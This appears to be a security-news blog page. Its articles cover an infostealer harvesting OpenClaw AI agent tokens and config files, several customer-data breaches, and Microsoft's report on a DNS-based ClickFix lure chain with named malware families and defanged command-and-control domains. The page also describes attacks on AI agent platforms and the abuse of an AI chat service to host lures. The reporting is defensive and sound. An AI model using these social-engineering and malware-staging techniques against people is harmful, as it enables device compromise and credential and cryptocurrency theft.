Though updated models now include defenses like shifting signal frequencies, smart antenna adjustments, or improved data coding, security levels differ - especially on legacy commercial units still active. While some agencies and companies pour resources into monitoring tools for orbital activity, spotting odd patterns as they happen remains a priority. Older hardware often lags behind when it comes to resilience against modern threats. 

Nowadays, dependence on space technology keeps growing - so does the link between orbit safety and digital protection. Because global guidelines for close-up satellite activities remain sparse, maneuvers by inspection craft push demands for better rules. These safeguards aim to shield vital networks running everyday online functions. What happens above affects what happens below.
Read more »
Vidar stealer variant
AI agent data theft AI infostealer malware Data Breach Hudson Rock research OpenClaw security breach Vidar stealer variant

Infostealer Breach Exposes OpenClaw AI Agent Configurations in Emerging Cyber Threat

 

Cybersecurity experts have uncovered a new incident in which an information-stealing malware successfully extracted sensitive configuration data from OpenClaw, an AI agent platform previously known as Clawdbot and Moltbot. The breach signals a notable expansion in the capabilities of infostealers, now extending beyond traditional credential theft into artificial intelligence environments.

"This finding marks a significant milestone in the evolution of infostealer behavior: the transition from stealing browser credentials to harvesting the 'souls' and identities of personal AI [artificial intelligence] agents," Hudson Rock said.

According to Alon Gal, CTO of Hudson Rock, the malware involved is likely a variant of Vidar, a commercially available information stealer that has been active since late 2018. He shared the details in a statement to The Hacker News.

Investigators clarified that the data theft was not carried out using a specialized OpenClaw-focused module. Instead, the malware leveraged a broad file-harvesting mechanism designed to search for sensitive file extensions and directory paths. Among the compromised files were:
  • openclaw.json – Containing the OpenClaw gateway authentication token, a redacted email address, and the user’s workspace path.
  • device.json – Storing cryptographic keys used for secure pairing and digital signing within the OpenClaw ecosystem.
  • soul.md – Documenting the AI agent’s operational philosophy, behavioral parameters, and ethical guidelines.
Security researchers warned that stealing the gateway token could enable attackers to remotely access a victim’s local OpenClaw instance if exposed online, or impersonate the client in authenticated gateway interactions.

"While the malware may have been looking for standard 'secrets,' it inadvertently struck gold by capturing the entire operational context of the user's AI assistant," Hudson Rock added. "As AI agents like OpenClaw become more integrated into professional workflows, infostealer developers will likely release dedicated modules specifically designed to decrypt and parse these files, much like they do for Chrome or Telegram today."

The disclosure follows mounting scrutiny over OpenClaw’s security posture. The platform’s maintainers recently announced a collaboration with VirusTotal to examine potentially malicious skills uploaded to ClawHub, strengthen its threat model, and introduce misconfiguration auditing tools.

Last week, the OpenSourceMalware research team reported an active ClawHub campaign that bypasses VirusTotal detection. Instead of embedding malicious payloads directly within SKILL.md files, threat actors are hosting malware on imitation OpenClaw websites and using the skills as decoys.

"The shift from embedded payloads to external malware hosting shows threat actors adapting to detection capabilities," security researcher Paul McCarty said. "As AI skill registries grow, they become increasingly attractive targets for supply chain attacks."

Another concern raised by OX Security involves Moltbook, a Reddit-style forum built specifically for AI agents operating on OpenClaw. Researchers found that AI agent accounts created on Moltbook cannot currently be deleted, leaving users without a clear method to remove associated data.

Meanwhile, the STRIKE Threat Intelligence team at SecurityScorecard identified hundreds of thousands of publicly exposed OpenClaw instances, potentially opening the door to remote code execution (RCE) attacks.

"RCE vulnerabilities allow an attacker to send a malicious request to a service and execute arbitrary code on the underlying system," the cybersecurity company said. "When OpenClaw runs with permissions to email, APIs, cloud services, or internal resources, an RCE vulnerability can become a pivot point. A bad actor does not need to break into multiple systems. They need one exposed service that already has authority to act."

Since its launch in November 2025, OpenClaw has experienced rapid adoption, amassing more than 200,000 stars on GitHub. On February 15, 2026, Sam Altman announced that OpenClaw founder Peter Steinberger would be joining OpenAI, stating, "OpenClaw will live in a foundation as an open source project that OpenAI will continue to support."
Read more »
Vendor Risk Management
Cloud Security Threats Customer Data Exposure Data Breach E Commerce Security payment processor breach Ransomware attack social engineering attacks Third Party Risk Vendor Risk Management

Hackers Leak 600000 Customer Records as Canada Goose Opens Investigation


 

Luxury retail is a rarefied industry where reputations travel faster than seasonal collections. Canada Goose, a brand associated with Arctic-quality craftsmanship and premium exclusivity, is now facing scrutiny from an unexpected part of the internet. 

In a cyber incident that the outerwear company insists did not originate within its walls, a cache of customer transaction data has appeared on a notorious ransomware leak site, putting the company at the center of the cyber incident that appears to have originated from a cache of customer transaction information. It has been reported that hackers have compromised Canada Goose's internal systems, but the luxury clothing brand maintains that its systems have not been compromised. 

On ShinyHunters' data leak portal, Canada Goose has been listed as having had 600,000 customer records exfiltrated by the notorious ransomware collective ShinyHunters. This dataset, which is approximately 1.67 gigabytes in size, contains detailed information regarding e-commerce orders, such as customer names, addresses, telephone numbers, and credit card numbers. 

It is the company's preliminary assessment that the exposed information relates to historical customer transactions, and no evidence indicates a breach of Canada Goose's corporate network has yet to be discovered. In response to the company's statements, it is actively reviewing the authenticity, origin, and scope of the dataset and will take appropriate measures if any potential risks to customers arise. 

There are partial details in the leaked records, including payment card brand names, the final four digits of card numbers, and in some cases, the first six digits of the issuing bank's name. Among the additional data in the dataset are payment authorization metadata, order histories, device and browser information, and transaction values.

Despite the absence of full credit card numbers, cybersecurity experts warn that even partial financial and transactional information can be manipulated to facilitate targeted scams, social engineering attacks, and fraud schemes. As part of its public denial, ShinyHunters has not indicated that the Canada Goose dataset is connected with recent social engineering campaigns targeted at single sign-on environments and cloud infrastructures.

In its claim, the group asserts that the records are a result of a breach of the payment processor in August 2025, a claim which has not been independently verified. According to the structure of the leaked data, it may have been derived from a hosted storefront or external payment processing platform, a fact that may support the group's assertion.

ShinyHunters has established itself as a company that penetrates e-commerce ecosystems, SaaS platforms, and cloud-hosted services, obtaining and publishing large quantities of consumer data in order to exert additional pressure on these companies. As described in threat intelligence assessments, ShinyHunters are an established data extortion operation with a history of obtaining and publicizing significant amounts of customer information from leading brands and online platforms.

Since the early 2010s, the group has been associated with a number of high-profile intrusions that frequently target e-commerce ecosystems, software as a service providers, and cloud environments where large datasets can be aggregated and monetized. 

A number of security researchers have also linked the collective with voice phishing and other social-engineering techniques aimed at compromising corporate credentials and shifting into cloud-based systems. In accordance with established patterns, stolen data is typically leveraged for financial coercion, sold on underground marketplaces, or published publicly on the leak portal of the group when ransom demands have not been met. 

Currently, it is not possible to determine whether Canada Goose has impacted customers in the exact manner described above. The company has stated it is examining the dataset to determine its authenticity, origin, and breadth before making a determination regarding whether customer notifications will be necessary.

There is a report that the exposed records contain partial payment card information, including the brand name of the card, the final four digits of the card number, and the ISIN number of the issuing bank, as well as details regarding the payment authorization. 

Cybersecurity professionals note that, even if full primary account numbers are not presented, truncated financial information, when combined with names, contact information, and transaction histories, can materially increase the success rate of targeted phishing schemes, credential harvesting schemes, and fraud schemes.

In addition to purchase histories, order values, and device and browser metadata, the dataset contains transaction information as well. Using such contextual information may allow adversaries to identify high spenders and develop convincing, transaction specific lures that mimic legitimate post-purchase correspondences.

Despite the lack of complete payment card details, the level of granularity increases downstream risk. Separately, ShinyHunters has recently been linked by independent researchers to a series of social engineering campaigns aimed at compromising single-sign-on environments and cloud accounts through social engineering.

According to the group, when questioned whether there was a correlation between those operations and the Canada Goose data, they denied such a connection, stating that the records were a consequence of a breach at a third-party payment processor dating back to August 2025. This assertion has not been independently verified. 

There is an apparent similarity between the structure of the leaked files including field labels such as checkout identifiers, shipping line entries, cart tokens, and cancellation metadata and export schemas that are typically generated by hosted storefronts and payment processing platforms. Although this does not establish the provenance of the data definitively, it indicates that the data may have originated within the environment of an external service provider rather than from a direct compromise of the retailer’s internal systems. 

It is evident that the incident underscores a broader reality facing retailers operating in increasingly interconnected digital supply chains. While core systems may remain unchanged, exposure risks may arise from third-party integrations which handle payments, order processing, and customer data storage. 

It has been observed by industry analysts that organizations that utilize external commerce and payment infrastructure must conduct rigorous vendor risk assessments, monitor their vendors continuously, and coordinate incident response procedures to limit downstream exposure. 

Customers are advised to maintain increased vigilance against unsolicited communications that reference past purchases or payment activity until the scope of the data is conclusively understood. 

A key takeaway from this episode is that data stewardship goes far beyond corporate boundaries, and resilience relies on ecosystem oversight as much as internal security protocols.
Read more »
South Korea
American Firms Coupang Data Breach economic impact legal challenges South Korea

More U.S. Investors Join Legal Dispute With South Korea Over Coupang Data Breach

 



A fresh wave of U.S.-based investment firms has joined an ongoing legal confrontation with the government of South Korea over its handling of a large scale cybersecurity incident involving Coupang.

On February 11, it was confirmed that three additional investors, Abrams Capital, Durable Capital Partners, and Foxhaven Asset Management, have formally moved to participate in arbitration proceedings. These firms are aligning with Greenoaks Capital and Altimeter Capital, which had already initiated legal action. By filing official notices, the new claimants are adopting and supporting the earlier case rather than launching a separate one.

At the center of the dispute is an allegation that South Korean authorities unfairly targeted Coupang and, by extension, other U.S.-linked businesses operating in the country. The investors claim that Seoul’s regulatory response following a large-scale consumer data breach amounted to discriminatory treatment that caused severe financial harm.

The controversy traces back to a disclosure made in November, when Coupang announced that personal information belonging to roughly 33 million customers in South Korea had been exposed in a cyber incident. Data breaches of this scale typically involve unauthorized access to customer records, which may include names, contact information, and other identifying details. The announcement triggered widespread public concern, political scrutiny, legal complaints, and cross-border tensions.

According to the investors pursuing arbitration, the government’s actions after the breach significantly affected shareholder value, resulting in losses amounting to billions of dollars. They argue that the regulatory measures taken were disproportionate and damaged investor confidence.

In addition to arbitration efforts, the newly joined investors have sent letters supporting calls for a formal review by U.S. authorities into South Korea’s conduct. Neil Mehta, founder and managing partner of Greenoaks Capital, stated that American policymakers and investors increasingly view the case as an example of the need to defend U.S. companies against what they see as unfair foreign government actions.

Coupang was established in 2010 by Korean-American entrepreneur Bom Kim, a graduate of Harvard University. Over the past decade, it has become the most widely used e-commerce platform in South Korea, surpassing long-established domestic conglomerates such as Shinsegae in online retail presence. The company has expanded beyond traditional online shopping into food delivery services, streaming platforms, and financial technology offerings, further strengthening its footprint in the country’s digital economy.

South Korea’s Justice Ministry has confirmed receipt of additional notices signaling intent to arbitrate. In an official statement, the ministry said it would respond in a systematic and professional manner through its International Investment Dispute Response Team, indicating that the government intends to formally defend its position.

The issue has also contributed to rising trade friction between Washington and Seoul. U.S. President Donald Trump has warned that tariffs on South Korean goods could increase to as much as 25 percent amid broader economic tensions.

Separately, the United States House Committee on the Judiciary recently issued a subpoena to Coupang as part of an ongoing investigation examining alleged discriminatory treatment of American companies operating abroad.

As arbitration proceedings advance, the case is expected to test not only corporate accountability in the wake of major data breaches, but also the strength of international investment protections and the diplomatic balance between two long-standing economic partners.

Read more »
Nslookup Exploit
CastleLoader Malware ClickFix Attack DNS-based malware Lumma Stealer macOS infostealer malware Nslookup Exploit

Microsoft Uncovers DNS-Based ClickFix Variant as Stealer Campaigns Escalate Across Windows and macOS

 

Microsoft has revealed a new evolution of the ClickFix social engineering technique, where attackers manipulate users into executing commands that initiate a Domain Name System (DNS) lookup to fetch a secondary malicious payload.

In this updated approach, threat actors use the “nslookup” command—short for nameserver lookup—triggered through the Windows Run dialog. The command performs a custom DNS query that retrieves instructions for the next stage of the attack.

ClickFix has gained traction in recent years and is commonly distributed through phishing emails, malvertising campaigns, and drive-by download schemes. Victims are typically redirected to fraudulent landing pages featuring fake CAPTCHA checks or fabricated system alerts, urging them to run commands in the Windows Run dialog or the macOS Terminal app to “resolve” non-existent issues.

The technique has spread rapidly over the past two years because it relies on users unknowingly infecting their own systems, effectively bypassing traditional security safeguards. Its success has led to multiple offshoots, including FileFix, JackFix, ConsentFix, CrashFix, and GlitchFix.

"In the latest DNS-based staging using ClickFix, the initial command runs through cmd.exe and performs a DNS lookup against a hard-coded external DNS server, rather than the system's default resolver," the Microsoft Threat Intelligence team said in a series of posts on X. "The output is filtered to extract the Name: DNS response, which is executed as the second-stage payload."

Microsoft explained that this variation uses DNS as a “lightweight staging or signaling channel,” allowing attackers to communicate with their infrastructure while introducing an additional validation layer before delivering the next payload.

"Using DNS in this way reduces dependency on traditional web requests and can help blend malicious activity into normal network traffic," the Windows maker added.

Following the DNS lookup, the attack chain downloads a ZIP archive from an external server (“azwsappdev[.]com”). Inside is a malicious Python script that conducts system reconnaissance, executes discovery commands, and drops a Visual Basic Script (VBScript). That VBScript launches ModeloRAT—a Python-based remote access trojan previously linked to CrashFix campaigns.

To maintain persistence, the malware creates a Windows shortcut (LNK) file in the Startup folder, ensuring automatic execution whenever the system reboots.

Lumma Stealer and CastleLoader Activity Intensifies

Separately, Bitdefender has reported a spike in Lumma Stealer operations, fueled by ClickFix-style fake CAPTCHA campaigns. These attacks deploy an AutoIt-based version of CastleLoader, a loader attributed to a threat actor known as GrayBravo (formerly TAG-150).

CastleLoader checks for virtualization environments and certain security software before decrypting and executing the stealer in memory. Beyond ClickFix tactics, attackers are also using websites offering cracked software and pirated movies to lure victims into downloading malicious installers disguised as MP4 files.

Additional campaigns have delivered a counterfeit NSIS installer that runs obfuscated VBA scripts before launching AutoIt components responsible for loading Lumma Stealer. The VBA component establishes scheduled tasks to ensure persistence.

"Despite significant law enforcement disruption efforts in 2025, Lumma Stealer operations continued, demonstrating resilience by rapidly migrating to new hosting providers and adapting alternative loaders and delivery techniques," the Romanian cybersecurity company said. "At the core of many of these campaigns is CastleLoader, which plays a central role in helping LummaStealer spread through delivery chains."

One domain tied to CastleLoader infrastructure (“testdomain123123[.]shop”) was also identified as a Lumma Stealer command-and-control (C2) server, suggesting possible collaboration or shared services between operators. India has recorded the highest number of Lumma infections, followed by France, the U.S., Spain, Germany, Brazil, Mexico, Romania, Italy, and Canada.

"The effectiveness of ClickFix lies in its abuse of procedural trust rather than technical vulnerabilities," Bitdefender said. "The instructions resemble troubleshooting steps or verification workarounds that users may have encountered previously. As a result, victims often fail to recognize that they are manually executing arbitrary code on their own system."

Expanding Threat Landscape: RenEngine, macOS Stealers, and Malvertising

CastleLoader is not the only distribution mechanism in play. Since March 2025, campaigns using RenEngine Loader have spread Lumma Stealer through fake game cheats and pirated applications such as CorelDRAW. In these cases, RenEngine deploys Hijack Loader, which then installs the stealer. Kaspersky data shows primary impact in Russia, Brazil, Turkey, Spain, Germany, Mexico, Algeria, Egypt, Italy, and France.

Meanwhile, macOS users are increasingly being targeted. A campaign leveraging phishing and malvertising techniques has distributed Odyssey Stealer—a rebranded version of Poseidon Stealer and a fork of Atomic macOS Stealer (AMOS). The malware steals credentials and cryptocurrency wallet data from over 200 browser wallet extensions and multiple desktop wallet apps.

"Beyond credential theft, Odyssey operates as a full remote access trojan," Censys said. "A persistent LaunchDaemon polls the C2 every 60 seconds for commands, supporting arbitrary shell execution, reinfection, and a SOCKS5 proxy for tunneling traffic through victim machines."

Other campaigns include:
  • Fake CAPTCHA pages on compromised websites tricking Windows users into running PowerShell commands that deploy StealC.
  • Email phishing attacks using malicious SVG files inside password-protected ZIP archives to deliver the open-source .NET stealer Stealerium.
  • Abuse of generative AI platforms such as Claude to host ClickFix instructions distributed via sponsored Google search results.
  • Fake Medium articles impersonating Apple’s Support Team to spread macOS stealers via domains like “raxelpak[.]com.”
"The C2 domain raxelpak[.]com has URL history going back to 2021, when it appeared to host a safety workwear e-commerce site," MacPaw's Moonlock Lab said. "Whether the domain was hijacked or simply expired and re-registered by the [threat actor] is unclear, but it fits the broader pattern of leveraging aged domains with existing reputation to avoid detection."

Malvertising abuse has also raised concerns. "The ad shows a real, recognized domain (claude.ai), not a spoof or typo-squatted site," AdGuard said. "Clicking the ad leads to a real Claude page, not a phishing copy. The consequence is clear: Google Ads + a well-known trusted platform + technical users with high downstream impact = a potent malware distribution vector."

macOS Threats on the Rise

Security researchers note a broader shift toward targeting Apple systems with advanced infostealers. According to recent analysis, macOS stealers now target more than 100 Chrome cryptocurrency extensions, and attackers are even acquiring legitimate Apple developer signatures to bypass Gatekeeper protections.

"Nearly every macOS stealer prioritizes cryptocurrency theft above all else," the company said. "This laser focus reflects economic reality. Cryptocurrency users disproportionately use Macs. They often hold significant value in software wallets. Unlike bank accounts, crypto transactions are irreversible. Once seed phrases are compromised, funds disappear permanently with no recourse."

"The 'Macs don't get viruses' assumption is not just outdated but actively dangerous. Organizations with Mac users need detection capabilities for macOS-specific TTPs: unsigned applications requesting passwords, unusual Terminal activity, connections to blockchain nodes for non-financial purposes, and data exfiltration patterns targeting Keychain and browser storage."


Read more »
Volvo Breach
Conduent Hack Data Breach Identity Theft Ransomware attack Volvo Breach

Volvo Hit in Conduent Breach Affecting 25 Million

 

A major data breach at business services provider Conduent has spiraled into a large-scale security incident affecting at least 25 million people across the United States, with Volvo Group North America among the latest victims. The breach, originally disclosed in early 2025, is now understood to be far more extensive than first reported, impacting residents in multiple states and exposing sensitive personal data. Texas authorities now estimate that 15 million people have been affected, up from an initial 4 million, while more than 10 million individuals in Oregon have also been caught up in the incident.

Conduent first confirmed in November 2025 that a cyberattack in January 2025 had exposed personal data belonging to over 10 million people. The compromised information included names, addresses, dates of birth, Social Security numbers, and health and insurance details, making it highly valuable for identity theft and fraud. Earlier, in April 2025, the company had revealed that attackers stole names and Social Security numbers during the same January intrusion, highlighting a pattern of gradually escalating disclosures as the scale of the breach became clearer.

Operational disruption accompanied the data exposure, as Conduent disclosed that a January cyberattack caused service outages impacting agencies in multiple U.S. states. Wisconsin and Oklahoma reported issues affecting payments and customer support, underscoring how attacks on back-office providers can cascade into interruptions of public services. Subsequent investigation determined that hackers had maintained access to Conduent’s network from October 21, 2024, to January 13, 2025, giving them ample time to exfiltrate personal data, including Social Security numbers, dates of birth, addresses, and health-related information.

The Safepay ransomware group later claimed responsibility for the attack in February 2025, adding an extortion dimension to the incident. Conduent, which offers printing and mailroom services, document processing, payment integrity, and other back-office support, has been sending breach notifications on behalf of affected clients, including Volvo Group North America. According to a filing with the Maine Attorney General, Volvo reported that 16,991 employees were impacted, and the company said it only learned of the incident in January 2026, many months after the original intrusion window.

In its notification letters, Conduent informed individuals that some of their personal information may have been involved due to services provided to their current or former health plans. The company stated it is not aware of any attempted or actual misuse of the compromised data but is urging recipients to consider steps to protect themselves. As part of its response, Conduent is offering free identity protection services to those affected, reflecting ongoing concern about long-term risks posed by the theft of such highly sensitive information.
Read more »
Subscribe to: Comments (Atom)